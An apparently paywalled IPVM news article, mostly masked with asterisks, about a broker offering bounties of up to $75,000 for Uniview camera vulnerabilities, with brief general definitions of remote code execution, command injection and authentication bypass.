Bounty Up To $75,000 For Uniview Vulnerabilities Examined
While Axis' bug bounty program only offers up to $3,000 rewards, one company is offering up to $75,000 for Uniview vulnerabilities, claiming they are in "high demand".
SSD previously disclosed a Uniview vulnerability in 2021, which IPVM recently examined: Uniview CVE-2021-45039 8.9 Vulnerability Analyzed.
In this post, IPVM examines this bounty, whether the price is fair, and who could be paying.
*******, ******* *** ****** ******** *** Uniview ***** ******* ** *** ** paying **** ***. ***** **** ******* itself, ******* ******* ********* ***** ** interested, ****** * **** ** ******* device *****.
"Uniview *************** *** ** **** ******"
**** ******** *** **** ******** ************ ****** ***************** "** ** $**,*** ** ******* for *************** ** *******'* ********!"
*** **** ** ***'* ******** ********* ** * ******* ******** ***** * ***** ********** ** Uniview *** ******** ***** ******* *************** are ** ******.
Who **** ***?
*** **** *** *** ******* (** other) *************** ** *******; **** ********* SSD ******** ***** *** *******, ******** a **** ***** ** **********, *******, it *** *** *******.
** ******* *** ******, ** ***** be **** ****** ** ********* **** itself ****** **** ***** ******* * third *****. (******* *** *** ******* to ****'* ******* ******** ******.)
Other ******** **********
***** **** *******, ** ** **** possible * ********* ***** ** ****** SSD.
*** *******, **** ** ** ******* tech ******** ***** ******* ******* *** ******** their *****,****** ** **** "***** ** *** U.S. *** *** ******* ******". ****'************ ** ********* **** ***** *** ******, *** firm ****** **** * *********** ** vulnerabilities ** *** ***** *** ********* from ******.
***** ********* *************** ** ********* *** ****-***** **** day *************** ******** ********* ** ** $*.** *** *** submission; ******** ***** *** ** *** field **** ** **** ** *** program.
SSD ***********
***** *** *** *** ******* ** this *******, ************ ********* ** ****:
** *** ***** ** ******* *************** from ******** *********** *** *** *** vendors ** *** ****, ** **** publish *************** *** ** **** ****** to *** **** * *****, ** make **** ****** ** *****
*******, **** ***** *** ** ****** SSD *** *************** **** *******'*.
*** **** **** "** ******* *** vendor" *** "*** ************* ** *********** disclosed *** *********",*** *** ******** ********** *******.
High ******** ** ****
****' ******* ****** ****** *** ********* $*,*** **** * $*** *******. IPVM's ******* **** ******** *******, ****** it ** "******* ***** ** *** skill *** **** ******", ********** ***** Axis' ****** ** *** ******** ********* enterprise ******** (******* *** ***).
*** *********,****** ****** ********** ********** **** **** ***** **** $100 ** $**,***;********* ****** *************** $**,*** ** $***,***.
Bashis: $**,*** "**********"
****'* ************* **********, ******, ********* $**,*** "reasonable" ******** ** ***** "**** ****** never ***** $**,*** ******* **** **********":
* ***** *** ****** ** **********, considering *** ****** ** **** *** time ******** *********** ***** **** ** invest ** ******** **** ******* ******. Now ***'* **** ** ***** **** the ****** **** **** ****** ***** reach $**,*** ******* **** **********.
** * ******** **********, **** ********* the *** ****** ******* **** *** SSD, ** ** ***** **** ***'* would ** **** ********** *** **** security ***********.
* **** ***** **** *** *** bug ****** ****** ******* *** ****** a ************ ******** * ******** ********** is ** **** ******** ***** ** the ********. *** *** ****** - high ***********, **** *** ****** - low ***********.
*******, ** ** *** ******* **** offers **** *** ******, *** *** SSD ****** ** ** $**,*** ** something **** **** *** ***** ******.
*** ***** ** *** ****, ** an *********** ******** ********** ***** ***** out ** **** ******* ** *** industry, *** *** ****** ***** ***** be * ***, *** ***** * t-shirt ** ****.
Vulns "** ******": ******* *********, **** ******, ******* *********
*** ****** ***'* ******** ***** ******** ***** Uniview *************** *** ** ******:
*** ***** ***** *** ****** ** video ************:
- code/command ********* involves attackers remotely executing commands i.e. no need for user input per ***********. **** ** * ****** **** of ***** ************ *************, *.*. ********* ***** *(***** **** *** ******** ****).
- command *********: a command injection is "an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application", according to *** ******** ********* *****.* ********' * *** ************* * ******* ********* ****.
- authentication ****** means pretending to be a legitimate user to gain access. This is also common, e.g. this was how the Verkada Mass Hack happened. * ** ******' * *** ************** ************** ****** *****.
SSD **********
*** **** ** ************ *** ***** ** *****, ***** Korea.**** *******,** ******* **** ********, **** ** is ********* "******** *** *** ****** Disclosure *******" ** ********.
*** **** ********* ***** ** ********:*** ********* ** ******, *** ******** researchers ** ***** *****, *** *** security ********** ** *******. *******, **** is *** * **** ********* ***** many ******* ** ********* ***** *** anonymous/avoid *********** **********.
*** **** ***** ** ****** ********** in *********** **********;*** ** *** ***** ************** ***** ********** *******:
Vulns ****** *** *********, ********, ***, *********
***'******** ***** ********* *** **** ******** ***** **** numerous ****** ****** **** **** ** mobile ********* (******** *********, ********) *** OS/Browsers (******, *******, *****). *** ***** surveillance, *** ***** *********, ********, *********, and *** ***** **** *******:
- ********* ** *****, *** ** ******* are ********.
- ******** *** *** *** **** ********* but **** ** *******. ******** ** best ***** *** *********** ** ****** **** ** * ***** ****** attack **** ****** ****** ******** ******.
- *********, * ***** ****** ***/***, ** listed.*** ********** ****"** *** ****** ** *** **** interested ** *** & **** ***************" in***** ******** ****** ** *****.
*******, * ******** ***** ** **** named (********) *** *******.
Bounties *** ******
**** ** ******* **** ***** *** other ******** ***** ******* *** ***** video ************ *************, *******, *** **** is *** ** ********* *** ****** offered ***************. **** ****** *** **** is **** * **** ** ******** advertising ****** ***** *******. **** ********** that ***** ************ ********* *** ***** assume **** *** ****** *** ******** trying ** ******* *********** *************** *** their ******** *** ** ******** ** taking ******** ********.
SSD **********, ******* ** ********
**** ********* ******* *** *** ********** for **** *******, ******* ******* *********. If **** **, ** **** ******.
*** *** *********? *** ****** ** money ******* ********** ***** **** ** quite ***** *** ***** *********** ********* plus *** ****** ******** ** *** is ***** ** **** *** ** these ***************. ** ** ****** ** here (**** - * ******* ******** *** Video ************ ******* ********), ***** ** * **** ** the ****** **** **** ******** ************* are *** ***** ** ***** *************** are ********* *** ******.
"* ***** **** ** *** ***** of **** ******* ** ****".
$*
$**
** *** **** ***** *** $ amount, *** **** **** * *** of **** ** *****.
* **** ****** ** **** *** that *** "*** ** **"